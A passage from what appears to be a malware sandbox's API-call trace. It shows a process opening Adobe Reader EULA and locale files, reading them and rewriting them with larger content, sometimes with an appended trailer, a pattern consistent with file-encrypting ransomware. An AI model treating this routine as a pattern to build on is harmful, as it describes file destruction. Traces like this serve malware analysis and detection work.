lpUsedDefaultChar=0x0) returned 8 [0069.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f735ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0069.893] ReadFile (in: hFile=0x1cc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x416, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x416, lpOverlapped=0x0) returned 1 [0070.187] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.187] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x99e, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x99e, lpOverlapped=0x0) returned 1 [0070.188] CloseHandle (hObject=0x1cc) returned 1 [0070.189] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.190] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.190] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x462 [0070.190] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.190] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.190] ReleaseMutex (hMutex=0x168) returned 1 [0070.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0070.191] ReadFile (in: hFile=0x1cc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x462, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x462, lpOverlapped=0x0) returned 1 [0070.208] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.208] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9ea, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9ea, lpOverlapped=0x0) returned 1 [0070.208] CloseHandle (hObject=0x1cc) returned 1 [0070.210] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.210] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.211] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x48e [0070.211] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.211] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.211] ReleaseMutex (hMutex=0x168) returned 1 [0070.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0070.211] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93d88, nNumberOfBytesToRead=0x48e, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e93d88*, lpNumberOfBytesRead=0x311f2bc*=0x48e, lpOverlapped=0x0) returned 1 [0070.226] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.226] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa16, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0xa16, lpOverlapped=0x0) returned 1 [0070.226] CloseHandle (hObject=0x1cc) returned 1 [0070.227] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.228] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.228] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x410 [0070.228] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.228] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.229] ReleaseMutex (hMutex=0x168) returned 1 [0070.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0070.229] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x311f2bc*=0x410, lpOverlapped=0x0) returned 1 [0070.235] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.235] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x998, lpOverlapped=0x0) returned 1 [0070.235] CloseHandle (hObject=0x1cc) returned 1 [0070.240] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUS\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rus\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.241] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.241] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x578 [0070.241] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.241] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.241] ReleaseMutex (hMutex=0x168) returned 1 [0070.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0070.242] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x578, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x311f2bc*=0x578, lpOverlapped=0x0) returned 1 [0070.247] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.247] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f2d0*=0xb00, lpOverlapped=0x0) returned 1 [0070.247] CloseHandle (hObject=0x1cc) returned 1 [0070.249] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.249] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.249] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3f6 [0070.250] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.250] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.250] ReleaseMutex (hMutex=0x168) returned 1 [0070.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0070.250] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3f6, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x311f2bc*=0x3f6, lpOverlapped=0x0) returned 1 [0070.259] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.259] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x97e, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x97e, lpOverlapped=0x0) returned 1 [0070.260] CloseHandle (hObject=0x1cc) returned 1 [0070.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\AdobeCollabSync.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\adobecollabsync.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.264] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.264] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0070.264] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.265] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.265] ReleaseMutex (hMutex=0x168) returned 1 [0070.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.CAT", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0070.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.CAT", cchWideChar=19, lpMultiByteStr=0x1f88b2c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.CAT", lpUsedDefaultChar=0x0) returned 19 [0070.265] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0070.607] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.607] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0070.607] CloseHandle (hObject=0x1cc) returned 1 [0070.609] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\IA32.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ia32.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.609] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.609] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xe00 [0070.609] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.609] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.609] ReleaseMutex (hMutex=0x168) returned 1 [0070.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.CAT", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0070.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.CAT", cchWideChar=8, lpMultiByteStr=0x1f7342c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.CAT", lpUsedDefaultChar=0x0) returned 8 [0070.609] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0070.611] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0070.611] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x311f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0070.611] CloseHandle (hObject=0x1cc) returned 1 [0070.613] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\SaveAsRTF.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\saveasrtf.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.613] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.614] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4c00 [0070.614] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.614] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.614] ReleaseMutex (hMutex=0x168) returned 1 [0070.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.CAT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0070.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.CAT", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.CAT", lpUsedDefaultChar=0x0) returned 13 [0070.614] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.616] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3c00 [0070.616] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.616] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3c00 [0070.617] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.617] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0070.617] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0070.617] CloseHandle (hObject=0x1cc) returned 1 [0070.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\accessibility.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\accessibility.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.626] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.626] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa800 [0070.626] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.626] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.626] ReleaseMutex (hMutex=0x168) returned 1 [0070.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.CZE", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.CZE", cchWideChar=17, lpMultiByteStr=0x1f88a64, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.CZE", lpUsedDefaultChar=0x0) returned 17 [0070.626] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0070.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9800 [0070.630] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0070.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9800 [0070.631] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0070.631] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0070.631] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0070.631] CloseHandle (hObject=0x1cc) returned 1 [0070.633] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\eBook.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\ebook.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0070.634] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.634] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0070.634] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0070.634] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0070.634] ReleaseMutex (hMutex=0x168) returned 1 [0070.634] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.CZE", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 